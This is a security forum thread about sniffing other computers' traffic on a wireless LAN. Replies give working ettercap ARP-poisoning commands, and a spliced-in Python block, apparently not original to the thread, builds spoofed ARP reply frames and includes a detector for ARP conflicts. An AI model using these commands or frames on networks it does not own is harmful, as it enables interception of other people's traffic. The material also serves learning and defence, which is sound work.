ettercap is capable of capturing traffic from any computer on your network.
Hello guys,
I've been searching and asking around in a lot of places, trying to gather all the info I can, but I'm not yet convinced, so I decided to come here and ask for your help.
Problem: Wireshark captures only my traffic, and not that of the other computers in my network.
Solutions tried:
1 - At first I was using Windows 7 + Wireshark + WinPcap. I could capture only my own packets, in promiscuous mode or not.
2 - Following someone's advice, I burned a copy of BackTrack 4 and messed around with it a bit. Funny thing is: I could actually see the other computers' names appearing in the log, but no HTTP traffic at all, and I'm 100% sure they were browsing websites.
I've just been told: hey, you can't capture other computers' packets on your wireless, because your router probably doesn't support "port mirroring".
So I went googling a lot about that, and indeed it doesn't support it, so I can't monitor anything. But I didn't quit, because I find it hard to believe. I mean, is it impossible at all?
Also, I heard about ARP poisoning? Would that help? I'm kinda confused here. I think it's just weird. I mean, I'm connected through wireless, and I can grab my HTTP traffic, chat conversations and whatever, but not from the other computers?
If I start using ettercap, would it make a difference?
Thanks in advance
ettercap is capable of capturing traffic from any computer on your network.
You need to ARP poison the other users on your network so that they will think you're the default gateway and send you their packets. I'm guessing you are using eth0; even if you're in promiscuous mode in Wireshark, the only packets you will receive will be broadcast packets, because they are sent to all IPs on your subnet.
Wielder of the spoon of doom
Summercon, Toorcon, Defcon, Bsides, Derbycon, Shmoocon oh my
Come hang out with hackers on twitter @gunrunr556
I wish I could edit my last post. Just found something else, guys.
So I used the text version of ettercap and now I can see all the traffic going on.
i went:
ettercap -T -M arp -i wlan0 // // testing.cap
And I could see it. But I have this issue: the other computer on my network could barely open any site, maybe Google, but super slow and likely to fail the connection. But when he finally opens a site, I can see the traffic. At the moment only 2 computers were connected: mine with ettercap, and another laptop I have here for testing. Is there any part of the command I can change to improve this super lag going on?
Also, the second part of the command would be something like this:
cat testing.cap |grep -a http
This would allow me to filter only http*, but it's not working; it says the file does not exist.
You are poisoning the entire network. Try:
ettercap -T -M arp -i wlan0 /target_computer_ip/ /router_ip/ testing.cap
don't worry about me I am msfconsole retarded
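The two replies above explain the mechanism (ARP poison the victims so they send their frames to you instead of the gateway) and the fix for the lag (poison only the victim/router pair instead of `// //`). The following is an added example, not code from the thread or from ettercap, that models that offline: it builds the actual 42-byte ARP reply frames an ARP MITM sends, enumerates which spoofed mappings a whole-LAN run versus a targeted run would push, and includes the check a defender would run over observed ARP traffic (one IP advertised from two MACs). The LAN (four hosts, the attacker MAC and IP) and the target-group model of ettercap's `//` are constructed assumptions; nothing is transmitted.

```python
"""ARP cache poisoning, modelled offline: what an ettercap-style ARP MITM
sends, why `// //` touches every host on the LAN, and how a defender spots
it. Constructed example network; no frame is ever put on the wire."""
import struct
from typing import Dict, List, Set, Tuple

ETHERTYPE_ARP = 0x0806
ARP_OP_REPLY = 2

# Constructed LAN: real IP -> MAC mappings (assumed, not taken from the thread).
ATTACKER_MAC = "aa:aa:aa:aa:aa:aa"
ATTACKER_IP = "192.168.1.99"
HOSTS = {
    "192.168.1.1": "00:11:22:33:44:01",   # router / default gateway
    "192.168.1.10": "00:11:22:33:44:10",  # victim laptop
    "192.168.1.20": "00:11:22:33:44:20",  # uninvolved host
    "192.168.1.30": "00:11:22:33:44:30",  # uninvolved host
}


def mac_bytes(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", ""))


def ip_bytes(ip: str) -> bytes:
    return bytes(int(octet) for octet in ip.split("."))


def build_arp_reply(sender_mac: str, sender_ip: str, target_mac: str, target_ip: str) -> bytes:
    """Ethernet II frame carrying an RFC 826 ARP reply (14 + 28 = 42 bytes).
    The receiver caches (sender_ip -> sender_mac) with no authentication at all,
    so a poisoned reply simply lies about sender_mac."""
    eth_hdr = mac_bytes(target_mac) + mac_bytes(sender_mac) + struct.pack("!H", ETHERTYPE_ARP)
    # hardware type Ethernet, protocol IPv4, hlen 6, plen 4, opcode reply
    arp_hdr = struct.pack("!HHBBH", 1, 0x0800, 6, 4, ARP_OP_REPLY)
    arp_body = mac_bytes(sender_mac) + ip_bytes(sender_ip) + mac_bytes(target_mac) + ip_bytes(target_ip)
    return eth_hdr + arp_hdr + arp_body


def parse_arp_reply(frame: bytes) -> Dict[str, str]:
    """Decode the fields a victim's ARP cache would act on."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETHERTYPE_ARP:
        raise ValueError("not an ARP frame")
    return {
        "sender_mac": ":".join(f"{b:02x}" for b in frame[22:28]),
        "sender_ip": ".".join(str(b) for b in frame[28:32]),
        "target_ip": ".".join(str(b) for b in frame[38:42]),
    }


def poison_pairs(group1: List[str], group2: List[str], hosts: Dict[str, str]) -> Set[Tuple[str, str]]:
    """(receiver_ip, spoofed_ip) pairs for an ARP MITM between two target groups.
    An empty group stands for 'every known host', like ettercap's `//`.
    Simplified model of ettercap -M arp, not its actual implementation."""
    g1 = list(group1) or list(hosts)
    g2 = list(group2) or list(hosts)
    pairs: Set[Tuple[str, str]] = set()
    for a in g1:
        for b in g2:
            if a != b:
                pairs.add((a, b))  # tell a that b's IP lives at the attacker's MAC
                pairs.add((b, a))  # and tell b the same about a
    return pairs


def poison_frames(attacker_mac: str, pairs: Set[Tuple[str, str]], hosts: Dict[str, str]) -> List[bytes]:
    return [build_arp_reply(attacker_mac, spoofed_ip, hosts[receiver], receiver)
            for receiver, spoofed_ip in sorted(pairs)]


def legit_traffic(hosts: Dict[str, str]) -> List[bytes]:
    """Constructed baseline: every host truthfully answers the attacker's ARP scan."""
    return [build_arp_reply(mac, ip, ATTACKER_MAC, ATTACKER_IP) for ip, mac in hosts.items()]


def arp_conflicts(frames: List[bytes]) -> Dict[str, Set[str]]:
    """Defender's check: an IP advertised from more than one MAC in the observed
    ARP replies is a poisoning indicator (what arpwatch-style monitors alert on)."""
    seen: Dict[str, Set[str]] = {}
    for frame in frames:
        reply = parse_arp_reply(frame)
        seen.setdefault(reply["sender_ip"], set()).add(reply["sender_mac"])
    return {ip: macs for ip, macs in seen.items() if len(macs) > 1}


if __name__ == "__main__":
    whole_lan = poison_pairs([], [], HOSTS)                           # like `// //`
    targeted = poison_pairs(["192.168.1.10"], ["192.168.1.1"], HOSTS)  # like `/victim/ /router/`
    print(f"{len(whole_lan)} spoofed mappings for the whole LAN vs {len(targeted)} targeted")
    observed = legit_traffic(HOSTS) + poison_frames(ATTACKER_MAC, targeted, HOSTS)
    print("IPs with conflicting MACs:", sorted(arp_conflicts(observed)))
```

With four other hosts, the whole-LAN run rewrites twelve IP-to-MAC mappings and puts every host's traffic through the attacker's box, while the targeted run rewrites only the victim's view of the router and the router's view of the victim; the defender's check flags exactly the IPs whose mappings were spoofed in either case.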
Please read up on switches, hubs, and routers (maybe even span ports). Then read up on ARP and ARP Spoofing. Then you'll understand why you only see your traffic.
Working as expected, no surprise here.
> Solutions tried:
> 1 - At first I was using Windows 7 + Wireshark + WinPcap. I could capture only my own packets, in promiscuous mode or not.
Again working as expected, no surprise here.
> 2 - Following someone's advice, I burned a copy of BackTrack 4 and messed around with it a bit. Funny thing is: I could actually see the other computers' names appearing in the log, but no HTTP traffic at all, and I'm 100% sure they were browsing websites.
You should probably learn how networks function before you try to test them or break them. It's like learning to crawl before trying to run. Learning to change the oil in your car before trying to do a total engine overhaul.
Without some knowledge on which to base the stuff you're doing you'll only end up wasting your time or worse breaking something that someone else has to fix or that someone else depends on (whether it's you, your family, your school or the company you work for).
Don't let this discourage you. Yes everyone has to start somewhere but some fundamental knowledge will help you a lot here.
Last edited by thorin; 02-09-2011 at 03:15 AM.
I'm a compulsive post editor, you might wanna wait until my post has been online for 5-10 mins before quoting it as it will likely change.
I know I seem harsh in some of my replies. SORRY! But if you're doing something illegal or posting something that seems to be obvious BS I'm going to call you on it.